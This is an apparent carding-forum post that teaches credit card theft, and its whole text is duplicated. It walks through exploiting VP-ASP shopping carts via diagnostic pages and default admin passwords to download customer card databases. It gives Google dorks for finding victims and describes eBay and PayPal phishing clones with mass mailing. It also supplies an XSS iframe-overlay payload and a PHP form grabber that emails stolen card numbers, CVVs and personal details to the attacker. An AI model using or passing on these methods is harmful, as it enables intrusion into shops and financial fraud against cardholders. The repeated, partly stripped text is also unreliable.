Extreme Hot Seller ( Westernunion ) Rating ⭐⭐⭐⭐⭐
Verified Seller
Premium User
Forum Elite
What is a credit card?
Credit cards are of two types:
Debit Card
Credit Card
1. Debit means you have a sum of amount in it and u can use them.
2. Credit means you have a credit line limit like of $10000 and u can use them and by the end of month pay it to the bank.
To use a credit card on the internet u just do not need cc number and expiry but u need much info like :
First name
Last name
CC number
CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashier.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
Credit Card Scams ( usually used for earning money , some times for shopping )
Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method doesn't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u see whenever u try to buy something on the internet with cc, they show u a well-programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple...
1. Go to and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***
A page will appear contain those:
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***
If you didn't download the Database, try this while there is dblocation:
the url will be: ****://***
If u see the error message you have to try this :
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
Username: vpasp
password: vpasp
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: it's basically or for general credit cards, or if u want to target any specific cashable bank like then u have to create a clone page for that bank.
What is
It's a shopping site worldwide which is used by many billion people who use their credit cards on ebay. What you do is make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for a long time, and email the users of eBay.
How to get the emails of their users?
Go to and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. At least you will get some time.
Well u create a clone page of eBay, and mail the list u create from the spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page, u have PIN required so u also get the PIN number through which u can cash through ATM ..
Now if u run eBay scam or PayPal scam, it's up to your luck who's your victim. A client of the bank of America or of Citibank or of the region, it's about luck, maybe u get cashable, maybe u don't its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvester or spider from the internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) that send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email [email protected] and in subject use : eBay - Update Your eBay Account and in Name use eBay
Some Instructions:
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who owns a hosting company and co-locations or is dedicated he can hide your scam in some of the dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in the inbox of users.
[PART 2]
This is my method for getting fresh CC info, sent directly to an inbox of your choosing!
First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities and XSS vulnerabilities.
First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customers' e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.
Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.
You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<script language=javascript>
function submitPostLink()
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src="Ecommerce Web Site Hosting and Streaming from width="800"height="2400" style="z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;" frameborder=0 align=center></iframe>">
Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.
Search for "action=", and change the page following it to the third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....
PHP Code:
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";
$subject="SUBJECT - $ip";
$headers = "From: NAMEl<>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.
After putting all this together and uploading it to a host, you'll want to shorten you're redirect.html URL, you can use *******, or another shortening service. Then, you can send an e-mail to all the customer's e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.
A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is
They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use or where you can get SMS sent to you with no registration.
Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!
Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up.
carders forum njfliiboy
Auto delete alert!
For user security, all users who are inactive for 90 days will be deleted. Also their IP's and logs in case of police seizure.
Escrow Balance: 0$
[PART 3]
VP-ASP shopadmin vulnerability to gain access to a list of credit card numbers, addresses and other details customers have entered.
And for this you’ll need Microsoft Office Access.
1.Go to Google xD and add in the Search Bar inurl:”shopadmin.asp”
Just Administrator Shop admin
shopadmin.asp is the name of a certain webpage we can hack. Google can find those web pages for us with the “inurl” term.
“shop administrators only”
That is basically some of the text found on the web pages we can hack. So if the name of the web page is “shopadmin.asp”
and we find the text “shop administrators only” that page is hackable.
2. Now Google returns with our results. Choose any of those.
The Shopadmin.asp
3. Now it asks for a username and password. Don’t worry about this. In the address bar replace “shopadmin.asp” with “shopdbtest.asp”
It should take you to a page with some infs on it. Next to where it says “xDatabase” is the name of the database.
After Finding the Page Shopdbtest.asp Replace With
4. Download the database file and open it up with Access or your other software. Find “customers” and you’ll have a list of
customer details.
5. Have fun!
VP-ASP 6.50
1. Dork : ” powered by vpasp v 6.50 ”
2. Change the url to
3. Admin page : shopadmin.asp
The mdb Viewer After Downloading The Shopping.mdb Download The Program From here
DB Viewer .
After opining the DB
Credit cards are of two types:
Debit Card
Credit Card
1. Debit means you have a sum of amount in it and u can use them.
2. Credit means you have a credit line limit like of $10000 and u can use them and by the end of month pay it to the bank.
To use a credit card on the internet u just do not need cc number and expiry but u need much info like :
First name
Last name
CC number
CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky... you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called " BIN " (for example cc number is : 4121638430101157 then its bin is " 412163 "), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange..., well you cant do that, but there is specific persons in world who can do that. They call them selves " cashiers ". You can take some time to find a reliable cashier.
Now the question is every bank credit cards are cashable and every bin is cashable? Like citibank, bank of america , mbna .. are all banks are cashables ? Well answer is " NO ". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 - 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
Credit Card Scams ( usually used for earning money , some times for shopping )
Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method doesn't give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u see whenever u try to buy something on the internet with cc, they show u a well-programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I'm posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients 'credit card details', and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple...
1. Go to and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***
A page will appear contain those:
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe r
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***
If you didn't download the Database, try this while there is dblocation:
the url will be: ****://***
If u see the error message you have to try this :
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at, or use MS Office Access.
Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
Username: vpasp
password: vpasp
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: it's basically or for general credit cards, or if u want to target any specific cashable bank like then u have to create a clone page for that bank.
What is
It's a shopping site worldwide which is used by many billion people who use their credit cards on ebay. What you do is make a similar page same as eBay and upload it on some hosting which don't have any law restrictions, try to find hosting in Europe they will make your scam up for a long time, and email the users of eBay.
How to get the emails of their users?
Go to and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. At least you will get some time.
Well u create a clone page of eBay, and mail the list u create from the spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page, u have PIN required so u also get the PIN number through which u can cash through ATM ..
Now if u run eBay scam or PayPal scam, it's up to your luck who's your victim. A client of the bank of America or of Citibank or of the region, it's about luck, maybe u get cashable, maybe u don't its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvester or spider from the internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) that send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email [email protected] and in subject use : eBay - Update Your eBay Account and in Name use eBay
Some Instructions:
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don't find it easily, its very very hard part.
3. Maybe u have contacts with someone who owns a hosting company and co-locations or is dedicated he can hide your scam in some of the dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in the inbox of users.
[PART 2]
This is my method for getting fresh CC info, sent directly to an inbox of your choosing!
First, you need to find yourself a vulnerable shop. Won't go into too many details here, this should be pretty drilled into your head by now. You can do this with Google Dorks manually, or use tools like WebCruiser, SQLi poison, etc. What your looking for is a shop with both SQLi vulnerabilities and XSS vulnerabilities.
First, as you may have noticed on most databases containing CC info, it's encrypted, MD5, FPE, whatever it is it's not feasible to work with that. However, one thing you can work with is the current and former customers' e-mail addresses. Go ahead and rip the whole table with the customer information. If you're lucky, you'll get at least 10,000 e-mail addresses or more.
Next, you need to work with the XSS vulnerability. I've noticed the most common being POST vulnerability, so I'll go that route, but you can incorporate it with FORM or whatever.
You can use the following code to make a redirect.html or whatever you wish to name it. This page will load the vulnerable website immediately, with one exception, a giant IFRAME over it which of course is going to be another page you make.
PHP Code:
<script language=javascript>
function submitPostLink()
<body onload="submitPostLink()">
<form action="http://www.XXXXXXXcom/TextSearch.asp" name=postlink method="post">
<input type="hidden" name="NAMEOFVULNERABLEFIELD" value="<iframe src="Ecommerce Web Site Hosting and Streaming from width="800"height="2400" style="z-index: 0; position: absolute; top: 0; left: 0; overflow-y: hidden;" frameborder=0 align=center></iframe>">
Go ahead and goto the checkout page for the site you're working with, and save the page to your hard drive, including all the subdirectory files and images (firefox does this auto). Now, you need to edit the main file you just saved.
Search for "action=", and change the page following it to the third page you will make, which will be the PHP mail form that will send your e-mail all the information someone fills in the form. The code will look something like....
PHP Code:
$userinfo = "@com"; //your email here
$ip = getenv("REMOTE_ADDR");
$message .= "".$_POST['firstname']."\n";
$message .= "".$_POST['lastname']."\n";
$message .= "".$_POST['org_name']."\n";
$message .= "".$_POST['telephone']."\n";
$message .= "".$_POST['fax']."\n";
$message .= "".$_POST['email']."\n";
$message .= "---------------------------------------------\n";
$message .= "".$_POST['cctype']."\n";
$message .= "".$_POST['credcard']."\n";
$message .= "".$_POST['exp_mon']."\n";
$message .= "".$_POST['exp_year']."\n";
$message .= "".$_POST['cccvv']."\n";
$message .= "".$_POST['ccname']."\n";
$subject="SUBJECT - $ip";
$headers = "From: NAMEl<>";
$headers .= $_POST['eMailAdd']."\n";
$headers .= "MIME-Version: 1.0\n";
You'll want to follow this code with some html code that also looks like a copy of their site but with some text saying something along the lines of "sorry, this offer is no longer available" or something of the sort. I'll explain why right now.
After putting all this together and uploading it to a host, you'll want to shorten you're redirect.html URL, you can use *******, or another shortening service. Then, you can send an e-mail to all the customer's e-mail addresses, (AND YOU CAN BE CREATIVE), but something along the lines of them being a valuable customer, and because of that, you're giving them one of your newest products for only 99 cents! Make sure that on your checkout form, you list the item you choose, so they see it when they're checking out.
A great service to send bulk mail for FREE, and no trial or anything, that is if you don't have hacked SMTP to use, is
They let you send Unlimited e-mails to up to 5,000 different contacts. Not bad for free. You'll have to confirm your account with a cell phone, but you should just use or where you can get SMS sent to you with no registration.
Trust me, if you send enough e-mails to former customers, especially when it's in the health and supplement niche, if they get an offer for a 99 cent bottle or something, they're gonna jump all over that!
Anyway, if you have any questions, please feel free to ask, and I apologize if I was a little vague but I don't have much time right now but wanted to get this up.
carders forum njfliiboy
Auto delete alert!
For user security, all users who are inactive for 90 days will be deleted. Also their IP's and logs in case of police seizure.
Escrow Balance: 0$
[PART 3]
VP-ASP shopadmin vulnerability to gain access to a list of credit card numbers, addresses and other details customers have entered.
And for this you’ll need Microsoft Office Access.
1.Go to Google xD and add in the Search Bar inurl:”shopadmin.asp”
Just Administrator Shop admin
shopadmin.asp is the name of a certain webpage we can hack. Google can find those web pages for us with the “inurl” term.
“shop administrators only”
That is basically some of the text found on the web pages we can hack. So if the name of the web page is “shopadmin.asp”
and we find the text “shop administrators only” that page is hackable.
2. Now Google returns with our results. Choose any of those.
The Shopadmin.asp
3. Now it asks for a username and password. Don’t worry about this. In the address bar replace “shopadmin.asp” with “shopdbtest.asp”
It should take you to a page with some infs on it. Next to where it says “xDatabase” is the name of the database.
After Finding the Page Shopdbtest.asp Replace With
4. Download the database file and open it up with Access or your other software. Find “customers” and you’ll have a list of
customer details.
5. Have fun!
VP-ASP 6.50
1. Dork : ” powered by vpasp v 6.50 ”
2. Change the url to
3. Admin page : shopadmin.asp
The mdb Viewer After Downloading The Shopping.mdb Download The Program From here
DB Viewer .
After opining the DB